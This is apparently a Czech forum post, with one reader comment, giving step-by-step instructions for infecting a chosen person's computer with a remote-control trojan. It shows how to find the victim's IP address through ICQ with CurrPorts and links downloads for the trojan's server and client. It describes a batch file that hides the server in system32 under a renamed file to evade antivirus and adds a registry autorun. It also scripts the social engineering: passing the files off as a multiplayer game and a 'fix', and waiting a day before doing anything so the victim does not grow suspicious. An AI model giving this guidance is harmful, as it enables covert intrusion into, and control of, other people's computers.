Nasledující oddělím do 3. bodů
1.)Jak zjistit IP přes ICQ
2.)Jak zveřejnit IP
3.)Poskytnu fungující trojan
1.)Aby jste zjistily IP oběti, na kterou například chcete poslat trojského koně, musíte si stáhnout nějaké to příslušenství...
Na internetu nacházím spoustu příspěvků, jak jí zjistit, ale často bývají neúplné a tím pádem nefunkční..
Takže jak na to:
A- Budem potřebovat nějaký ten program, který mi ukáže oběťovu IP. Já používám Currports - který vám ukáže veškeré programy, které se snaží dostat z počítače. Jeho download naleznete [url=http://www.soom.cz/download/data/windows/hacking/utility/cports.zip]ZDE[/url]
jednoduše ho pustíte a kliknete na tlačítko refresh(na horním panelu) zobrazí se vám všechny programy, porty, IP adresy atd. navažte kontakt s danou osobou a klikněte na refresh - uvidíte, že se ICQ začalo komunikovat na spoustě dalších portech s poustu dalšimi IP adresami. (nové procesy jsou zvýrazneny zelenou barvou) -
pokud má uživatel zaplě skrití IP adresy, uvidíte mysto ní jen 0.0.0.0 -- máte smůlu -- vtip.. kdyby jste měli smůlu tak bych jsem nepsal .. důležité je, že se i tak dá IP adresa zjistit - chvilku s ním kecejte a pak mu pošlete nějaký soubor, o velikosti alespoň 1 MB .. v tu chvíli, když se jemu vyhoupne upozornění, že mu chcete něco poslat klikněte na refresh - zobrazí se nové procesy, ale těch si ješte nevšímejte .. (ale kliněte ať pak máte jistotu) .. a v tu chvíli jak on soubor přijme, klikněte na refresh detřetice.... zobrazí se vám tam jediný nový proces od ICQ - na kterém už bude (ve sloupci "Remote adres") napsaná jeho přímá IP adresa. a máte vyhráno ... IP si zapište pro pozdější použití a můžete currports vyonout
2.) btw, zveřejnit IP můžete tak, že zavoláte svému providerovy (poskytovatele internetu) a zeptáte se zda to vůbec podporuje.. pokud ano, počítejte s cenou 100 - 300 kč / měsíc
Jestli si chete ověřit, zda má veřejnou IP tak se ho jednoduše zeptejte - pokud nebude vědet o čem je řec - řekněte mu ať provede následující (zkuste si to taky ať to pochopíte)
Ať klikne na Start - Spustit (spustí CMD) a klikne na OK ... do otevřeného okna ať napíše "ipconfig" (bez uvozovek) a přečte vám číslice v řádku Adresa IP:...
Pokud IP adresa začíná na 192.168.xxx.xxx nebo 10.xxx.xxx.xxx tak je adresa neveřejná. pokud obsahuje cokoliv jiného tak je veřejná
3.)UPOZORNĚNÍ - Uživatel, komu chcete poslat tohoto trojana MUSÍ mít veřejnou IP - nebo musí být s vámi na lokální síti
A teď k tomu trojanovy.. jeho použití je velmi jednoduché -- stačí aby uživatel spustil [url=http://www.djbuldog.wz.cz/download/netctrl_server.zip]server[/url] (přejmenujte si ho jakkoliv a hlavně ho odzipujte) a vy se na něj připojíte pomocí [url=http://www.djbuldog.wz.cz/download/netctrl_client.zip]clienta[/url]
. Jakmile ho uživatel spustí, můžete si s ním dělat dost blbinek, ale jakmile vypne proces, se jménem toho serveru tak už ne. Na to jsem si ale napsal řešení ....
Stručný popis řešení .. (co udělá Game_fix.bat)
-Zkopíruje soubor Gogogo.exe (tak jsem si pojmenoval server, vydávaje ho za hru - která občas prostě nejde) do C:/Windows/system32 a pojmenuje ho Osa8.exe (Osa9.exe je součást Microsoft office ale pokud se tak bude jmenovat, antivir ho odhalí-takhle ne)
-Spustí soubor Game.reg (zeptá se to uživatele jestli ho hodlá zapsat do regystru) (řekněte že je to oprava té hry, která nefunguje - ve skutečnosti to zapříčíní, že se program s názvem Osa8.exe ve složce Windows/system32 bude pouštět při každém startu windows)
-a nakonec smaže sám sebe (game_fix.bat), Game.reg i Gogogo.exe(pokud je puštěný, tak ne-ale pokud ne, běží Osa:))
Game_fix.bat spustí osu8- nedal jsem to do stejného souboru protože se to občas seklo a uživatel mohl dostat podezrení)
pokud chcete soubory tyto soubory napište mi mail na petula.zika@centrum.cz a já vám je pošlu
nebo si je stáhněte [url=http://hosted.filefront.com/MaximusCZ/1904854]Tady[/url]
stáhněte všechno (gogogo.exe je ten server co musí spustit)
Jak ho zdolat aby to pustil?
po zeptáni na veřejnou IP vam odpoví, a zeptá se proč... vy mu povíte, že jste vytvořily hru - multiplayerovou ale často nefunguje. jestli by jí nezkusil .. on řekne že jo (když ne tak proste) a pošlete mu gogogo.exe .. on to spustí .(jak to posíláte tak si zjistíte IP z bodu 1.) a on vám řekne že nejde.. tak mu ještě pošlete Game_fix.bat a Game.reg ať to dá do stejné složky- a spustí Game_fix.bat -- tím si zaručí nakopírování jako Osy8.exe a její spouštění po startu windows...(ale ješt2 jí nemá spuštenou - proč když mu tam běží už jeden server.)-- ale gogogo mu nepude smazat - a teprve jestli vypne proces gogogo.exe - je tu důvod aby jsme mu poslali Game_fix2.bat a donutili ho spustit -- tím se spustí osa8 a vy už můžete vesele blbnout --
DOPORUČENÍ: Nezlobte ho hnedka .. vyzkoušejte, zda se připojíte - ale netropte nic, teprve až další den dělejte něco malého ať nemá podezření... Clienta si spustíte normal, a přidáte IP tím pluskem ,... napište tam jméno (jaký chcete) a do těch 4 kolonek IP. --
DOPORUČENÍ: ihned po pridání do seznamu si ho uložte (ta disketa) jinak se vám stane že po restartu programu tam už nebude a vy budete znova muset shánět jeho IP
DŮLEŽITÉ: V programu je jedna chyba - pokud se pokusíte připojit na vypnutý PC. zahlásí vám to připraven (nejste připojeni) pokud ale pred hláškou připraven uvidíte hlášku i že jse se připojily na vdálený PC tak je vše OK.
VELMI DŮLEŽITÉ: VYTVOŘTE SI KOPII SERVERU -pač se to občas smaže (po spuštění Game_fix.bat) a za žádnou cenu nedávejte Ano při dotazu na zapsání do registrů, nechcete být přeci oběť!!- jestli budete prozkoušet, co to umí na sobě - puste jen Gogogo.exe a připojte se na local (nefunguje Diskový manažer a obrázky, ale když se připojíte na někoho jiného tak to běží)
Komentáře
Přehled komentářů
Ahoj tento obsah je skopírován z jiného webu :D
kk
(FF, 22. 9. 2012 11:42)